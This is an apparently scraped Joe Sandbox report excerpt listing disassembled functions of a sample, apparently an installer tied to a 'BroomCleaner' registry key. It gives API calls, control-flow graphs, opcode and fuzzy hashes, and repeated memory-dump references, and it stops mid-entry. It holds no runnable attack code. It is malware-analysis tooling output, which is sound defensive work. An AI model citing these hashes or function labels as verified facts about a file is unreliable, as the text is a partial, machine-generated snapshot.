                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Read$PointerWrite
                                                                                                                                                                                                                                                              • String ID: PB@
                                                                                                                                                                                                                                                              • API String ID: 2113905535-661560245
                                                                                                                                                                                                                                                              • Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                                              • Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401B06 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 185timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                              • API String ID: 645384303-529226407
                                                                                                                                                                                                                                                              • Opcode ID: 6dca993ec0eefca6d03842fbfcb9c9df22dc411f7cc7b8210fc120c616c04e92
                                                                                                                                                                                                                                                              • Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dca993ec0eefca6d03842fbfcb9c9df22dc411f7cc7b8210fc120c616c04e92
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403B63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 472 403b63-403b8d GetTickCount 473 403b93-403be0 call 403b31 SetFilePointer 472->473 474 403d35-403d43 call 4039fe 472->474 480 403be3-403c11 call 403ae9 473->480 479 403d48-403d4f 474->479 483 403d45 480->483 484 403c17-403c27 480->484 483->479 485 403c2d-403c34 484->485 486 403c36-403c3d 485->486 487 403c68-403c88 call 40893d 485->487 486->487 488 403c3f-403c63 call 4039fe 486->488 492 403c8a-403c96 487->492 493 403cec-403cf1 487->493 488->487 494 403c98-403cc3 WriteFile 492->494 495 403cdf-403ce6 492->495 493->479 496 403cf3-403cf8 494->496 497 403cc5-403cc8 494->497 495->493 498 403ce8-403cea 495->498 496->479 497->496 499 403cca-403cd7 497->499 498->493 500 403cfa-403d0d 498->500 499->485 501 403cdd 499->501 500->480 502 403d13-403d32 SetFilePointer 500->502 501->500 502->474
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00403BCB
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403CB8
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00403D2F
                                                                                                                                                                                                                                                                • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                                                                                                                                                              • String ID: Lq
                                                                                                                                                                                                                                                              • API String ID: 1725291646-2684343615
                                                                                                                                                                                                                                                              • Opcode ID: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction ID: f7083fb0e86bb6005b9bf14dc6a8331a2f5849a6e81c63e88d49bae7df8a1a75
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18ae4545f5b30c3c28caf4f3d11ae2cad8807af871cef0b76668dc3cb6943506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3514AB1A183049FD720DF29E88532A7BB4FF44355F90893EE844A72A0D7789546CF9E
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402860 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 503 402860-402863 504 402869-40288e call 401400 * 2 503->504 505 40297c-402983 503->505 515 402890-4028b0 LoadLibraryExA 504->515 516 4028b8-4028c6 GetModuleHandleA 504->516 507 402a36-402a41 call 40163b 505->507 514 403831-403842 507->514 518 402970-402977 515->518 519 4028b6 515->519 516->515 520 4028c8-4028db GetProcAddress 516->520 518->507 519->520 522 40292d-40293f call 406fcb 520->522 523 4028dd-4028e5 520->523 530 402944-40294b 522->530 525 4028e7-4028fc call 40163b 523->525 526 4028fe-40292b 523->526 525->530 526->530 530->514 532 402951-40295c call 404a27 530->532 532->514 536 402962-40296b FreeLibrary 532->536 537 403677-403678 536->537 537->514
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                                                                              • String ID: #v
                                                                                                                                                                                                                                                              • API String ID: 1437655972-3234020506
                                                                                                                                                                                                                                                              • Opcode ID: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                                                                                                                                                              • Instruction ID: e70ddef41f08cbfaa68bc2c18546323f80d3119e0e26b2f1059722deacc19af5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2318FB16083009FD7106F258D4876EBAE8BF84764F51893FE485A33D0D7B88886DB1A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040820E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 538 40820e-40823a GetSystemDirectoryA 539 40824b-40824d 538->539 540 40823c-408249 538->540 541 408252-408296 wsprintfA LoadLibraryExA 539->541 540->541
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: \$C@
                                                                                                                                                                                                                                                              • API String ID: 2200240437-1790911818
                                                                                                                                                                                                                                                              • Opcode ID: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction ID: 6c0f10e39fe67b0a46f2467a814b7d530fefee384e0f0f9ebaf92f9caf306ff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9660503d559c2df304355e59e8a4c4b93ddf83edb93a1dccef26b9b85dfc474
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D014BB1508704AFD300EF68D98879EBBF4FB84308F54C83DD08996295D7789589CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408299 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 542 408299-4082b9 GetModuleHandleA 543 4082bb-4082be call 40820e 542->543 544 4082cc-4082e1 GetProcAddress 542->544 547 4082c3-4082ca 543->547 546 4082e2-4082e8 544->546 547->544 547->546
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                                                                                                                                                                • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                                              • String ID: UXTHEME$C@$C@
                                                                                                                                                                                                                                                              • API String ID: 2547128583-1808485004
                                                                                                                                                                                                                                                              • Opcode ID: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction ID: 23c7ce911dd590b504e17f07e60dbba2231cf2c7d4590c8d4e2d2ec4458658d6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6ce91f65d8d9bb7ee18f4d542f9107f4d6a72ffda61794c9569e264c57c3d17
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF08275A00A089BD710AF65D98446FBBF8FB88750B01C47DF98493324EA3499608B9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402613 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 548 402613-402637 call 401400 call 406fcb call 407779 554 40263c-402641 548->554 555 402647-40264e 554->555 556 402a3c-402a41 554->556 557 402650 555->557 558 4026b3-4026b5 555->558 559 403831-403842 556->559 560 402656-40266a WaitForSingleObject 557->560 562 4026c5-4026ce CloseHandle 558->562 563 40267b-402697 GetExitCodeProcess 560->563 564 40266c-402679 call 408848 560->564 562->556 566 403677-403678 562->566 568 4026b7-4026c3 563->568 569 402699-4026b2 call 407be3 563->569 564->560 566->559 568->562 569->558
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                              • API String ID: 3753073698-2564639436
                                                                                                                                                                                                                                                              • Opcode ID: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                                                                                                                                                              • Instruction ID: ac6e98feb3a7424ea682bb54f7c96fcb1bdc6a13fb689d46f8fa2a7810285b5b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9343e43865e4207d9138f12a8f752cf886ae069070fe727ca0ca3e2bbeffcac1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C218171908600DFD750AF25CD48BAEB7E5EB84315F51887EE489A3380D6795981CF2A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004076B0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 573 4076b0-40770e CreateDirectoryA 574 407710-407712 573->574 575 407714-407721 GetLastError 573->575 576 407741-407748 574->576 575->576 577 407723-40773d SetFileSecurityA 575->577 577->574 578 40773f GetLastError 577->578 578->576
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                                                                              • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00408D43 Relevance: 5.5, APIs: 4, Instructions: 458memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
